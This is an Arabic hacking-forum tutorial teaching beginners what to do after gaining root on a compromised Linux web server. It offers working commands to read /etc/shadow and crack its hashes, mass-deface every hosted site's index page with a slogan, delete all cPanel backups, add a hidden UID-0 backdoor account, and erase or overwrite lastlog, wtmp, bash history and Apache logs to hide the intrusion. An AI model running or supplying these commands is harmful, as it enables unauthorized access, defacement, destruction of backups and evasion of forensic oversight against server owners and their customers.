درس اليوم هوه عن بعد ما اخذت الرووت وكيف استفيد منه كمبتدى في السيطره على السيرفر ومن اهم
الاوامر التي اهم الاغراض يلي يفكر فيها بعد ما اخذ الرووت فالكثيرمن الشباب يوخذ رووت ولا يعرف ما يفعل بعد ذلك
ويوقف على الرووت ولا يعرف ما يفعل؟؟؟
الان ماخذ رووت على احد السيرفرات ومعي باسورد الرووت
الان نقوم بالدخول عن طريق ssh
نقوم بتحميل اي برنامج يدعم الاتصال عن طريق ssh مثل برنامج البيوتي







طبعا اكثركم يعرف يتصل وسهل جدا



الان راح تدخل الى شاشه الاوامر
ونقوم ننفذ الامر id
لنشوف صلاحياتنا







جميل جداا صلاحياتنا هنا رووت يعني بامكاننا عمل اي شي يخطر في بالك كانه جهازك
اول شي نقوم نقوم به باستعراض ملف shadow يلي يكون في داخله جميع باسوردات النظام
نقوم باستعراض الامر التالي
cat /etc/shadow
بعد تنفيذ الامر ظهر لنا جميع الباسوردات











الان ناخذ سطر من احد هالسطور ونقوم بشرحها على سبيل المثال
admin:$1$ezxMhlEW$ysj7fPPTITDZfFyoLc8Js.:12161:0:99999:7:::
يتكون اي سطر في ملف الشادو من سبع خانات يفصل بينهم بعلامة النقطتين ( : )
وكما نلاحظ انه الخانه الاولى تتكون من اسم admin وهو اليوزر
الخانه الثانيه هوه الباسورد المشفر $1$ezxMhlEW$ysj7fPPTITDZfFyoLc8Js
الان انواع التشفير في انظمه لينكس تختلف من نظام الى اخر
مثلا في اغلب انظمه لينكس يكون تشفير اغلب ملفات الشادو هوه تشفير des
الذي يتم تشفيره بسهوله ,اما في انظمه لينكس
FreeBSD و التوزيعات الجديدة لانظمة لينيكس يكون التشفير من نوع MD5 وهو تشفير بقوة 128 بت يصعب كسره
الان نرجع للخانه الثالثه وهي User ID يلي هوه 12161
الخانه الرابعه وتحتوي Group ID ويلي هوه0
هذا هي المجالات يلي تهمنا وهناك ايضا الخانه السابعه وهنا هي فارغه وهي تكون لنوع الشيل المستخدم لهذا الحساب
انتهينا الان من ملفات الحساب
الان نقوم فك تلك الباسوردات عن طريق برنامج جون ذا ريبر ونقوم بتحميله على السيرفر عن طريق موقع الشركه



وتم شرحها من قبل اخوناMr.TyrAnT على الرابط التالي



http://www.tryag.com/vb/showthread.php?t=10360



الان قمنا بوضع الحرووف على النقاط لكل مبتدى
طيب الان لو اردنا استخراج المواقع يلي على السيرفر ونعرف ما اسماء تلك المواقع يلي على السيرفر
نستخدم الامر
cat /etc/httpd/conf/httpd.conf | grep ServerName
نشوف الصوره بعد تنفيذ الامر







الان اذا اردت ان تغير الاندكس عليك بالاتجاه الى مسارات public_html
او مسارات www
يلي يوضع داخله الاندكس الرئيسيه للموقع تعال نشوف مع بعض عن طريق الامر
cat /etc/httpd/conf/httpd.conf
بعد تنفيذ الامر تعال انشوف الصوره







الان طبعااا راح تكون جميع المواقع يلي على السيرفر تحمل هذا المسار
/home/iraq/public_html/
طيب الان فقط نقوم بتغير iraq الى علانه النجمه (*)
لكي تشمل جميع المواقع يلي على السيرفر
ويكون الامر بالنهايه هوه
echo "fack root & USA & co.il">/home/*/public_html/index.html
غير مكان fack root & USA & co.il
بشعارك حق الاختراق
طيب لو ابي اغير اندكس موقع معين على السيرفر وش اسوي؟
تقوم بتغير النجمه باسم المستخدم يلي استخرجناه بالامر السابق
الان انا عندي احد الموقع يحمل الدومين http://staffordfire.org/
ومساره على السيرفر هوه
/home/sfd/public_html/
الان اغير الاندكس عن طريق الامر التالي
echo "fack root & USA & co.il"> /home/sfd/public_html/index.html







طيب حلووو جدا بعضكم يقوول ياعذابي فيه امر غير الامر هذا نبي امر



يكون فيه صور لنا والكتابات بالوان مختلفه يعني ابي احط صفحه على مزاجي



طيب اقووله لا تزعل والامر راح يكون بالشكل هذا



find / -name "index.*" -exec cp index.html {} ;



find / -name "default.*" -exec cp index.html {} ;



ويتم تنفيذه بأي مكان سواء بالجذر الرئيسي للمسار او المسار الحالي

لكن يشترط وجود الاندكس للاختراق بنفس مسارك عند تنفيذ الامر



امر اخر احببت افيد فيه عند تغيير الاندكس بهذ الامر سيكون ملكيه الملف بأسم root

وطبعا اصحاب المواقع سيعرفون انك روت على السيرفر من الحيل اللي تقدر تستخدمها تغير ملكيه جميع ملفات الانكس



وتكون طبعا بالامر التالي:)



find / -name "index.*" -exec chown 99 index.html {} ;



find / -name "default.*" -exec chown 99 index.html {} ;



طيب نجي الان لحذف جميع ملفات الباك اب على السيرفر



الامر التالي لحذف جميع ملفات الباك اب:)



find / -name "cpbackup*" -exec rm {} ;



find / -name "backup*" -exec rm {} ;



يتم ايجاد اي مجلداو ملف يحمل الاسم cpbackup او backup والنجمه تعبر عن اي كان خلف هذا الاسم

لان الباك اب يكون كمثال : backup10-5-2006

وهو انواع : سنوي - شهري - اسبوعي - يومي



طيب بعضكم يقول يبي انه يستهدف باك اب لموقع معين فقط؟؟



طيب يكون الامر كتالي:



اول شي يدخل على مجلد الباك اب:



cd /backup/cpbackup



راح يظهر لك
monthly
weekly
daily
نختار مثلا اليومي ونعطيه امر استعراض مع التصاريح
راح يكون مسارنا
root@host [/backup/cpbackup/daily]# ls -al
راح يظهر لنا با اب المواقع مضغووطه tar.gz
طيب نبي نحذف الان باك اب معين من الاسبوعي
root@host [/backup/cpbackup/weekly]# rm xxx.tar.gz
rm: remove regular file `xxx.tar.gz'? y
نضغط y وراح ينفذ الامر وخلاص عليه السلام نشووف الصوره









نختار الموقع المستهدف ونعطيه الامر rm xxx.tar.gz :)



=====



نجي للزبده شوي وللشغل الجامد



طيب الان لو ابي اضيف يوزر جديد بصلاحيات الروت اكرر الروت:) ادخل به عن طريق ssh
يعني انضيف حساب لنا باسمatabygeer وباسورد 123456789
حتى يكون لي حساب bin bash
يكون الامر بالشكل التالي



/usr/sbin/useradd -o -u 0 -g 0 atabygeer -p 123456789

طيب نجي نفصل الامر هذا بالتفصيل :

طبعا اليوزر: atabygeer
والباسورد : 123456789

-o : لاستخدام تغيرات مع الامر
-u : لاضافته الى مجموعه اليوزر ذات رقم 0 ( الي هي الروت )
-g : القروب او المجموعه ذات رقم 0 يعني مجموعه الروت ايضا .
----------------
ايضا تقدر عن طريق هذا الامر:

/usr/sbin/useradd -o -u 0 atabygeer

بعدين تدخل لهذا المستخدم باسورد بالطريقه التاليه:
passwd atabygeer

بعدين بيطلع لك الرساله التاليه:
New UNIX password:
تكتب الباسورد الي تبيه ولازم يكون معقد لانه ماراح يضبط معاك بباسورد سهل

بعدين يطلع لك الرساله التاليه:
Retype new UNIX password:
يعني اعد ادخال كلمه المرور
اعد كتابتها وراح تشوف الرساله التاليه :
Changing password for user atabygeer.
passwd: all authentication tokens updated successfully.
الف مبروك عليك مستخدم بصلاحيات روت كامله.







ولاضافة يوزر عادي له حساب bin bash



يكون بالامر التالي:



useradd -u 100 -o atabygeer -p 123456 -s /bin/bash



=======



طيب الان لو انت طموحك اكثر من تغير اندكس للمواقع
الان لو افترضنا انك ماخذ رووت على سيرفر وهذا السيرفر مشارك مع سيرفرات اخرى وعامله مشاركه
عن طريق برنامج samba الموجود داخل الينكس
وهوه مثله مثل sharing الي في الوندوز
راح تلقى درايفرات موضوعه على شكل ايبي ادخل الى هذه الدرايفرات وراح تقدر ايضاا اتغير الاندكس
للمواقع الموجوده عليهم وايضا تقدر تعرف ان السيرفر مشارك ام لا عن طريق الامرps aux
وشوف اذا البرنامج شغال ام لا
الان ناتي الى تركيب باكدور على السيرفر وطبعاا هنا الباكدور راح يكون له صلاحيات الرووت او اي روكيت تريده
ادخلوا على الرابط التالي وشرحه حبيبي 020 بالتفصيل



http://www.tryag.com/vb/showthread.php?t=7327



=====



نجي لاخر جزئيه:



طبعا هناك عمليات قمت بعملها على السيرفر والايبي حقك مسجل في ملفات الوجو في السيرفر
عليك الان مسح اثارك قبل الخرووج, وهذا الموضوع يحتاج الى درووس راح احاول اختصره بالقليل
من الاسطر فالنبدأ
الان سيرفرات الينكس تسجل كل العمليات التي حصلت على السيرفر في المسار التالي:



/var/log
و
/root/.bash_history



الان نقوم بالدخول الى المسار الاول وهوه
cd /var/log







الان يهمني في الامر الملف lastlog و ملف wtmp



طيب خلونا نشووف الملف هذا wtmp







يخرب بيت ابووووووووووووه مسجل الاي بي تبعي:)



طيب في هذا السيرفر مانع الرووت من تحرير ملفات الوجو وش السواه؟



نستخدم الامر echo يكون الامر:



echo "hi root">lastlog



لووووووووووووووووووووووووول
غيرت داخل الملف من الايبي حق الى جمله hi root
الان نعيد الكره مع ملف wtmp نعطيه الامر التالي



echo "hi root">wtmp



نشووف الان ندخل على الملفcat wtmp







لوووووووووووووووول غيرناها لجملةhi root



جميل جداااا الان بقي علينا نمسح اثرنا من ملف .bash_history
cat /root/.bash_history
راح تشاهد هنا جميع العمليات التي قمت بعملها



cat /root/.bash_history



الان اقوم بمسحها وكتابه مكانها اي شي يخطر على بالي مثال
echo "root">.bash_history
او echo "your server get hack">.bash_history
تم تغير العمليات بجمله your server get hack
ملاحظه تقدر تغير كلمة روت باالامر الاخير اي شي مثلا hiroot بدل your server get hack



وفيه امر يليت تجربونه لووووووووووول بس تراه بيشووتك بعدها هع



rm -rf /root/.bash_history;rm -rf /root/.ksh_history;rm -rf /root/lastlog;rm -rf /root/wtmp;rm -rf /root/wtmp.1;rm -rf /usr/local/apache/logs;rm -rf /usr/local/apache/log;rm -rf /var/apache/logs;rm -rf /var/apache/log;rm -rf /var/logs/lastlog;rm -rf /var/log/lastlog;rm -rf /tmp/logs/lastlog;



وبالاخير اقوول اوامرssh كثيره اختصرت منها المهم لكل مخترق وان شاء الله راح اضع ملف لاغلب اوامرssh



طبعا اغلب الموضوع شرح المبدع ( الإستاذ ) The Rock في احد دورات المنظمة



وقمت باضافة بعض الاشياء لكي يكتمل الموضوع والكمال لله سبحانه وتعالى



الي ارجوه انه اي واحد ينقل الموضوع هذا يذكر مصدره



جميع الحقوق محفووظه لــــــ:www.tryag.com\vb :::www.dwrat.com:::





تقبلوا تحياتي



عذابي غير



ابو نواف



منتديات ترياق العرب



http://www.tryag.com/vb








__________________